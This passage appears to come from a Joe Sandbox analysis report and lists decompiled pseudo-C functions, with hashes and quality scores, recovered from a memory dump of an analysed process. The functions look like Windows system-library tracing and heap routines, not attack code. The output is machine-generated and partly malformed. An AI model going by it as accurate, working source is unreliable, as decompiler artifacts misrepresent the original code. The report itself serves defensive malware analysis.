                            • Instruction ID: b032d47f277bec3ed98e10659b8c6be1195e675b4ea5fd05984c5eb771e0b1ae
                            • Opcode Fuzzy Hash: 7dc6fedc0f710226db43b871414bacd828fea3acebe82d104713c85303238d2c
                            • Instruction Fuzzy Hash: FC01F731A106489BC714EEBADC009AEF7A8EF86230F5900EDA905DB644EF31ED05C751
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 59%
                            			E0387FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                            				signed int _v12;
                            				intOrPtr _v24;
                            				intOrPtr _v28;
                            				intOrPtr _v32;
                            				short _v58;
                            				char _v64;
                            				void* __edi;
                            				void* __esi;
                            				signed char* _t18;
                            				intOrPtr _t24;
                            				intOrPtr _t30;
                            				intOrPtr _t31;
                            				signed int _t32;
                            
                            				_t29 = __edx;
                            				_t24 = __ebx;
                            				_v12 =  *0x38bd360 ^ _t32;
                            				_t30 = __edx;
                            				_t31 = __ecx;
                            				E0380FA60( &_v64, 0, 0x30);
                            				_v24 = _a4;
                            				_v32 = _t31;
                            				_v28 = _t30;
                            				_v58 = 0x266;
                            				if(E037E7D50() == 0) {
                            					_t18 = 0x7ffe0388;
                            				} else {
                            					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                            				}
                            				_push( &_v64);
                            				_push(0x10);
                            				_push(0x20402);
                            				_push( *_t18 & 0x000000ff);
                            				return E0380B640(E03809AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cb939183ba057ac6a6c1b771e52bbdd111aac8d5ea74b2478d77798ce957311f
                            • Instruction ID: bdbaff8ce70f1c291b40dc923cada36aa9ec679bd8a8c96330a7272c2373dabe
                            • Opcode Fuzzy Hash: cb939183ba057ac6a6c1b771e52bbdd111aac8d5ea74b2478d77798ce957311f
                            • Instruction Fuzzy Hash: E7018475A0030CABCB14DFA9D845FAEB7B8EF45710F4040A6FA00EB291EA70DA01C795
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 59%
                            			E0387FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                            				signed int _v12;
                            				intOrPtr _v24;
                            				intOrPtr _v28;
                            				intOrPtr _v32;
                            				short _v58;
                            				char _v64;
                            				void* __edi;
                            				void* __esi;
                            				signed char* _t18;
                            				intOrPtr _t24;
                            				intOrPtr _t30;
                            				intOrPtr _t31;
                            				signed int _t32;
                            
                            				_t29 = __edx;
                            				_t24 = __ebx;
                            				_v12 =  *0x38bd360 ^ _t32;
                            				_t30 = __edx;
                            				_t31 = __ecx;
                            				E0380FA60( &_v64, 0, 0x30);
                            				_v24 = _a4;
                            				_v32 = _t31;
                            				_v28 = _t30;
                            				_v58 = 0x267;
                            				if(E037E7D50() == 0) {
                            					_t18 = 0x7ffe0388;
                            				} else {
                            					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                            				}
                            				_push( &_v64);
                            				_push(0x10);
                            				_push(0x20402);
                            				_push( *_t18 & 0x000000ff);
                            				return E0380B640(E03809AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 53f14e0518537f9cc567391be70e7409f9251fc4772c1f0672815e4108bebd84
                            • Instruction ID: 863f47f680c63a552991d14c17d887d7dcc0d0d89d8b3ced9aa4ac1565a50d08
                            • Opcode Fuzzy Hash: 53f14e0518537f9cc567391be70e7409f9251fc4772c1f0672815e4108bebd84
                            • Instruction Fuzzy Hash: DE017175A00348ABCB14DFE9D845EAEB7B8EF44714F0040A6BA00EF291DA70D901C7A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E037DB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
                            				signed char _t11;
                            				signed char* _t12;
                            				intOrPtr _t24;
                            				signed short* _t25;
                            
                            				_t25 = __edx;
                            				_t24 = __ecx;
                            				_t11 = ( *[fs:0x30])[0x50];
                            				if(_t11 != 0) {
                            					if( *_t11 == 0) {
                            						goto L1;
                            					}
                            					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
                            					L2:
                            					if( *_t12 != 0) {
                            						_t12 =  *[fs:0x30];
                            						if((_t12[0x240] & 0x00000004) == 0) {
                            							goto L3;
                            						}
                            						if(E037E7D50() == 0) {
                            							_t12 = 0x7ffe0385;
                            						} else {
                            							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
                            						}
                            						if(( *_t12 & 0x00000020) == 0) {
                            							goto L3;
                            						}
                            						return E03847016(_a4, _t24, 0, 0, _t25, 0);
                            					}
                            					L3:
                            					return _t12;
                            				}
                            				L1:
                            				_t12 = 0x7ffe0384;
                            				goto L2;
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                            • Instruction ID: 8161916914fbb045a03a52663510a2c50cb7e0874c47378e8fefff7166ddafea
                            • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                            • Instruction Fuzzy Hash: 1A015E31205688DFD326C75CD988F667BE8EF45A50F0A00E1A915CBA51DB29DC80C621
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E03891074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                            				char _v8;
                            				void* _v11;
                            				unsigned int _v12;
                            				void* _v15;
                            				void* __esi;
                            				void* __ebp;
                            				char* _t16;
                            				signed int* _t35;
                            
                            				_t22 = __ebx;
                            				_t35 = __ecx;
                            				_v8 = __edx;
                            				_t13 =  !( *__ecx) + 1;
                            				_v12 =  !( *__ecx) + 1;
                            				if(_a4 != 0) {
                            					E0389165E(__ebx, 0x38b8ae4, (__edx -  *0x38b8b04 >> 0x14) + (__edx -  *0x38b8b04 >> 0x14), __edi, __ecx, (__edx -  *0x38b8b04 >> 0x14) + (__edx -  *0x38b8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
                            				}
                            				E0388AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
                            				if(E037E7D50() == 0) {
                            					_t16 = 0x7ffe0388;
                            				} else {
                            					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                            				}
                            				if( *_t16 != 0) {
                            					_t16 = E0387FE3F(_t22, _t35, _v8, _v12);
                            				}
                            				return _t16;
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9ac4411d3151affca7d75f86cc2db3477a43721874cbdfeff9735ff15c755197
                            • Instruction ID: c1d10440cf6ef221739e58513e0da63ac9df096cf4c38bcd7d1e0948cf467e15
                            • Opcode Fuzzy Hash: 9ac4411d3151affca7d75f86cc2db3477a43721874cbdfeff9735ff15c755197
                            • Instruction Fuzzy Hash: 4D014076508746DFDB15EFA9C904B1AB7D9AFC4310F088556F895D7390EE31D440CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 54%
                            			E03898ED6(intOrPtr __ecx, intOrPtr __edx) {
                            				signed int _v8;
                            				signed int _v12;
                            				intOrPtr _v16;
                            				intOrPtr _v20;
                            				intOrPtr _v24;
                            				intOrPtr _v28;
                            				intOrPtr _v32;
                            				intOrPtr _v36;
                            				short _v62;
                            				char _v68;
                            				signed char* _t29;
                            				intOrPtr _t35;
                            				intOrPtr _t41;
                            				intOrPtr _t42;
                            				signed int _t43;
                            
                            				_t40 = __edx;
                            				_v8 =  *0x38bd360 ^ _t43;
                            				_v28 = __ecx;
                            				_v62 = 0x1c2a;
                            				_v36 =  *((intOrPtr*)(__edx + 0xc8));
                            				_v32 =  *((intOrPtr*)(__edx + 0xcc));
                            				_v20 =  *((intOrPtr*)(__edx + 0xd8));
                            				_v16 =  *((intOrPtr*)(__edx + 0xd4));
                            				_v24 = __edx;
                            				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
                            				if(E037E7D50() == 0) {
                            					_t29 = 0x7ffe0386;
                            				} else {
                            					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                            				}
                            				_push( &_v68);
                            				_push(0x1c);
                            				_push(0x20402);
                            				_push( *_t29 & 0x000000ff);
                            				return E0380B640(E03809AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 29fa5a136ae7202e78cb9568448d6ae25bcbd211fb8a87ca172feb24b8810b73
                            • Instruction ID: 2dae24ba3f3117a374c8003d1a9c3d0ea1d9badce2dbc7f02ded6a7a9bdad060
                            • Opcode Fuzzy Hash: 29fa5a136ae7202e78cb9568448d6ae25bcbd211fb8a87ca172feb24b8810b73
                            • Instruction Fuzzy Hash: 81111E74A002499FDB44DFA8D445BAEF7F4FF08300F1442AAE518EB382E7349940CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 54%
                            			E03898A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                            				signed int _v12;
                            				intOrPtr _v24;
                            				intOrPtr _v28;
                            				intOrPtr _v32;
                            				intOrPtr _v36;
                            				intOrPtr _v40;
                            				short _v66;
                            				char _v72;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed char* _t18;
                            				signed int _t32;
                            
                            				_t29 = __edx;
                            				_v12 =  *0x38bd360 ^ _t32;
                            				_t31 = _a8;
                            				_t30 = _a12;
                            				_v66 = 0x1c20;
                            				_v40 = __ecx;
                            				_v36 = __edx;
                            				_v32 = _a4;
                            				_v28 = _a8;
                            				_v24 = _a12;
                            				if(E037E7D50() == 0) {
                            					_t18 = 0x7ffe0386;
                            				} else {
                            					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                            				}
                            				_push( &_v72);
                            				_push(0x14);
                            				_push(0x20402);
                            				_push( *_t18 & 0x000000ff);
                            				return E0380B640(E03809AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4c1b47a059b6796dc74f2590ed242963b4b8a3256005d3d73509d94db256f44e
                            • Instruction ID: b550ead1a84fc7c41ee52e2b5ebf583c24e75806e67a8e78fac5994b37e3e129
                            • Opcode Fuzzy Hash: 4c1b47a059b6796dc74f2590ed242963b4b8a3256005d3d73509d94db256f44e
                            • Instruction Fuzzy Hash: 4A011A75A0021DAFDB04DFA9D9419AEB7B8EF49310F14409AF904FB391E734A900CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E037CDB60(signed int __ecx) {
                            				intOrPtr* _t9;
                            				void* _t12;
                            				void* _t13;
                            				intOrPtr _t14;
                            
                            				_t9 = __ecx;
                            				_t14 = 0;
                            				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
                            					_t13 = 0xc000000d;
                            				} else {
                            					_t14 = E037CDB40();
                            					if(_t14 == 0) {
                            						_t13 = 0xc0000017;
                            					} else {
                            						_t13 = E037CE7B0(__ecx, _t12, _t14, 0xfff);
                            						if(_t13 < 0) {
                            							L037CE8B0(__ecx, _t14, 0xfff);
                            							L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
                            							_t14 = 0;
                            						} else {
                            							_t13 = 0;
                            							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
                            						}
                            					}
                            				}
                            				 *_t9 = _t14;
                            				return _t13;
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                            • Instruction ID: 2e16ae253afe28f9012b4c2efd2170ac0ebe2aa34d3cd485639d87c8d9f1d494
                            • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                            • Instruction Fuzzy Hash: A0F0FC372216E29BD332DE5548C4F27F6A69FC1B60F19003DF5099F744C9708C029AE4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E037CB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
                            				signed char* _t13;
                            				intOrPtr _t22;
                            				char _t23;
                            
                            				_t23 = __edx;
                            				_t22 = __ecx;
                            				if(E037E7D50() != 0) {
                            					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
                            				} else {
                            					_t13 = 0x7ffe0384;
                            				}
                            				if( *_t13 != 0) {
                            					_t13 =  *[fs:0x30];
                            					if((_t13[0x240] & 0x00000004) == 0) {
                            						goto L3;
                            					}
                            					if(E037E7D50() == 0) {
                            						_t13 = 0x7ffe0385;
                            					} else {
                            						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
                            					}
                            					if(( *_t13 & 0x00000020) == 0) {
                            						goto L3;
                            					}
                            					return E03847016(0x14a4, _t22, _t23, _a4, _a8, 0);
                            				} else {
                            					L3:
                            					return _t13;
                            				}
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                            • Instruction ID: 792ddea7192c221f9f350ffccc9c5348c6eee43def067bce5c4169944b296568
                            • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                            • Instruction Fuzzy Hash: C80121322006C4DBC322C39ED809F69BF98EF41350F0D00E9F911CB6B1D638C840C224
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 46%
                            			E0385FE87(intOrPtr __ecx) {
                            				signed int _v8;
                            				intOrPtr _v16;
                            				intOrPtr _v20;
                            				signed int _v24;
                            				intOrPtr _v28;
                            				short _v54;
                            				char _v60;
                            				signed char* _t21;
                            				intOrPtr _t27;
                            				intOrPtr _t32;
                            				intOrPtr _t33;
                            				intOrPtr _t34;
                            				signed int _t35;
                            
                            				_v8 =  *0x38bd360 ^ _t35;
                            				_v16 = __ecx;
                            				_v54 = 0x1722;
                            				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
                            				_v28 =  *((intOrPtr*)(__ecx + 4));
                            				_v20 =  *((intOrPtr*)(__ecx + 0xc));
                            				if(E037E7D50() == 0) {
                            					_t21 = 0x7ffe0382;
                            				} else {
                            					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
                            				}
                            				_push( &_v60);
                            				_push(0x10);
                            				_push(0x20402);
                            				_push( *_t21 & 0x000000ff);
                            				return E0380B640(E03809AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                            			}

                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 67397dc58f0a9938564b61b76da3766958c61287e7a3e4b161a2d3dcfe8c9ab5
                            • Instruction ID: a93e2443749d5f51c75fddf5f8ab5d5ac270c4138883e7b6c032d8c121c9b895
                            • Opcode Fuzzy Hash: 67397dc58f0a9938564b61b76da3766958c61287e7a3e4b161a2d3dcfe8c9ab5
                            • Instruction Fuzzy Hash: 60014F74A0020CEFCB14DFA8D546A6EB7B4EF08304F1441A9B914EF382E635D901CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 48%
                            			E0388131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                            				signed int _v8;
                            				intOrPtr _v12;
                            				intOrPtr _v16;
                            				intOrPtr _v20;
                            				intOrPtr _v24;
                            				short _v50;
                            				char _v56;
                            				signed char* _t18;
                            				intOrPtr _t24;
                            				intOrPtr _t30;
                            				intOrPtr _t31;
                            				signed int _t32;
                            
                            				_t29 = __edx;
                            				_v8 =  *0x38bd360 ^ _t32;
                            				_v20 = _a4;
                            				_v12 = _a8;
                            				_v24 = __ecx;
                            				_v16 = __edx;
                            				_v50 = 0x1021;
                            				if(E037E7D50() == 0) {
                            					_t18 = 0x7ffe0380;
                            				} else {
                            					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                            				}
                            				_push( &_v56);
                            				_push(0x10);
                            				_push(0x20402);
                            				_push( *_t18 & 0x000000ff);
                            				return E0380B640(E03809AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                            			}

                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 913496cb533511693f4d8ed540b08ad147bcd79f854fdbbd43c7e934e37b5e50
                            • Instruction ID: 686c292b71aee6fcd7d1a3f1631da8172933d0937f57c39dff7daaf5544a1a46
                            • Opcode Fuzzy Hash: 913496cb533511693f4d8ed540b08ad147bcd79f854fdbbd43c7e934e37b5e50
                            • Instruction Fuzzy Hash: 2C011D75A0124CAFCB44EFE9D545AAEB7F4EF48700F504099F905EB391EA74AA00CB55
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 48%
                            			E03898F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                            				signed int _v8;
                            				intOrPtr _v12;
                            				intOrPtr _v16;
                            				intOrPtr _v20;
                            				intOrPtr _v24;
                            				short _v50;
                            				char _v56;
                            				signed char* _t18;
                            				intOrPtr _t24;
                            				intOrPtr _t30;
                            				intOrPtr _t31;
                            				signed int _t32;
                            
                            				_t29 = __edx;
                            				_v8 =  *0x38bd360 ^ _t32;
                            				_v16 = __ecx;
                            				_v50 = 0x1c2c;
                            				_v24 = _a4;
                            				_v20 = _a8;
                            				_v12 = __edx;
                            				if(E037E7D50() == 0) {
                            					_t18 = 0x7ffe0386;
                            				} else {
                            					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                            				}
                            				_push( &_v56);
                            				_push(0x10);
                            				_push(0x402);
                            				_push( *_t18 & 0x000000ff);
                            				return E0380B640(E03809AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                            			}

                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c8411391ddb87c4fae59ebb7d272404d7f0a3eceee640627137146bdf2e2e5d4
                            • Instruction ID: 1a7a3a1559d1702d0e5afdb45b7802b8c993882ca504334ad0325aa5b4ebed82
                            • Opcode Fuzzy Hash: c8411391ddb87c4fae59ebb7d272404d7f0a3eceee640627137146bdf2e2e5d4
                            • Instruction Fuzzy Hash: 08014475A0020DAFDB04EFA8D545AAEB7F4EF48300F54409AF905EB381EB74DA00CB95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 46%
                            			E03881608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                            				signed int _v8;
                            				intOrPtr _v12;
                            				intOrPtr _v16;
                            				intOrPtr _v20;
                            				short _v46;
                            				char _v52;
                            				signed char* _t15;
                            				intOrPtr _t21;
                            				intOrPtr _t27;
                            				intOrPtr _t28;
                            				signed int _t29;
                            
                            				_t26 = __edx;
                            				_v8 =  *0x38bd360 ^ _t29;
                            				_v12 = _a4;
                            				_v20 = __ecx;
                            				_v16 = __edx;
                            				_v46 = 0x1024;
                            				if(E037E7D50() == 0) {
                            					_t15 = 0x7ffe0380;
                            				} else {
                            					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                            				}
                            				_push( &_v52);
                            				_push(0xc);
                            				_push(0x20402);
                            				_push( *_t15 & 0x000000ff);
                            				return E0380B640(E03809AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
                            			}

                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 043141affe27ff8886775542cb633b59eff3b910c43977d3ab279f147abab780
                            • Instruction ID: 74a3603aaf3d6ae2b8ef12fbc1550d832e6eec15e57a3c4c82b37a03088f2693
                            • Opcode Fuzzy Hash: 043141affe27ff8886775542cb633b59eff3b910c43977d3ab279f147abab780
                            • Instruction Fuzzy Hash: 8CF04975A04248EFCB04EFE8D849AAEB7B4AF08300F4440A9A915EB291EA349900CB94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E037EC577(void* __ecx, char _a4) {
                            				void* __esi;
                            				void* __ebp;
                            				void* _t17;
                            				void* _t19;
                            				void* _t20;
                            				void* _t21;
                            
                            				_t18 = __ecx;
                            				_t21 = __ecx;
                            				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E037EC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x37a11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                            					__eflags = _a4;
                            					if(__eflags != 0) {
                            						L10:
                            						E038988F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                            						L9:
                            						return 0;
                            					}
                            					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                            					if(__eflags == 0) {
                            						goto L10;
                            					}
                            					goto L9;
                            				} else {
                            					return 1;
                            				}
                            			}

                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 74281c539b5b4ad724bbc0baa4d38b5121732213bfdb58067f1be526ceb1e23d
                            • Instruction ID: d4afe5255dde95559c35134da9bdef16b4b738edb0451f3fe8d91381dacc89f9
                            • Opcode Fuzzy Hash: 74281c539b5b4ad724bbc0baa4d38b5121732213bfdb58067f1be526ceb1e23d
                            • Instruction Fuzzy Hash: 77F0BEBA9157929FE733C768C004F22BFE89B0D670F7C84A7D43687201C6A4D880C261
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 54%
                            			E0380927A(void* __ecx) {
                            				signed int _t11;
                            				void* _t14;
                            
                            				_t11 = L037E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
                            				if(_t11 != 0) {
                            					E0380FA60(_t11, 0, 0x98);
                            					asm("movsd");
                            					asm("movsd");
                            					asm("movsd");
                            					asm("movsd");
                            					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
                            					 *((intOrPtr*)(_t11 + 0x24)) = 1;
                            					E038092C6(_t11, _t14);
                            				}
                            				return _t11;
                            			}

                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                            • Instruction ID: ebc72d0b03691fe3dad44730d12a3806d450f3fb02c012f7e43dff3c66c39d5c
                            • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                            • Instruction Fuzzy Hash: F9E02B723406006BD761DE5ACC84F03775DDF82720F0440B8F5005E293C6E5DC0887A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 43%
                            			E03898D34(intOrPtr __ecx, intOrPtr __edx) {
                            				signed int _v8;
                            				intOrPtr _v12;
                            				intOrPtr _v16;
                            				short _v42;
                            				char _v48;
                            				signed char* _t12;
                            				intOrPtr _t18;
                            				intOrPtr _t24;
                            				intOrPtr _t25;
                            				signed int _t26;
                            
                            				_t23 = __edx;
                            				_v8 =  *0x38bd360 ^ _t26;
                            				_v16 = __ecx;
                            				_v42 = 0x1c2b;
                            				_v12 = __edx;
                            				if(E037E7D50() == 0) {
                            					_t12 = 0x7ffe0386;
                            				} else {
                            					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                            				}
                            				_push( &_v48);
                            				_push(8);
                            				_push(0x20402);
                            				_push( *_t12 & 0x000000ff);
                            				return E0380B640(E03809AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
                            			}

                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f7b83e47623f1116012050f050cf43e8fe682316161667e193a9c0ba2fbc2d4b
                            • Instruction ID: 24699450ded3561f4f765e87ccb8c74b966eb4f161900b6c7da7eb52aac0fec1
                            • Opcode Fuzzy Hash: f7b83e47623f1116012050f050cf43e8fe682316161667e193a9c0ba2fbc2d4b
                            • Instruction Fuzzy Hash: 4BF09A75A0470CAFDB04EFA8D845A6EB7B4AF08200F5480AAE905EB291EA34D900CB54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 94%
                            			E03882073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                            				void* __esi;
                            				signed char _t3;
                            				signed char _t7;
                            				void* _t19;
                            
                            				_t17 = __ecx;
                            				_t3 = E0387FD22(__ecx);
                            				_t19 =  *0x38b849c - _t3; // 0x0
                            				if(_t19 == 0) {
                            					__eflags = _t17 -  *0x38b8748; // 0x0
                            					if(__eflags <= 0) {
                            						E03881C06();
                            						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
                            						__eflags = _t3;
                            						if(_t3 != 0) {
                            							L5:
                            							__eflags =  *0x38b8724 & 0x00000004;
                            							if(( *0x38b8724 & 0x00000004) == 0) {
                            								asm("int3");
                            								return _t3;
                            							}
                            						} else {
                            							_t3 =  *0x7ffe02d4 & 0x00000003;
                            							__eflags = _t3 - 3;
                            							if(_t3 == 3) {
                            								goto L5;
                            							}
                            						}
                            					}
                            					return _t3;
                            				} else {
                            					_t7 =  *0x38b8724; // 0x0
                            					return E03878DF1(__ebx, 0xc0000374, 0x38b5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
                            				}
                            			}

                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b8eec60907c98f204d11bcb99b1f554de475fba4e7b43e726df1acdac74b1fbd
                            • Instruction ID: 2922adbfe3d1876810486c334bdc69f3914ffe8449908d0f1726fe9e796e0250
